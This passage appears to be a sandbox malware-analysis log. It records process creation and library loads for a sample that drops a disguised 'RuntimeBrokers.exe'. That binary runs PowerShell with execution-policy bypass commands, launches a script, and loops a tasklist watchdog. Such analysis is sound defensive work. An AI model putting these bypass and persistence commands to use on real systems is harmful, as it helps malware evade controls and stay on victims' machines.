Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\CnjMEmbChO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
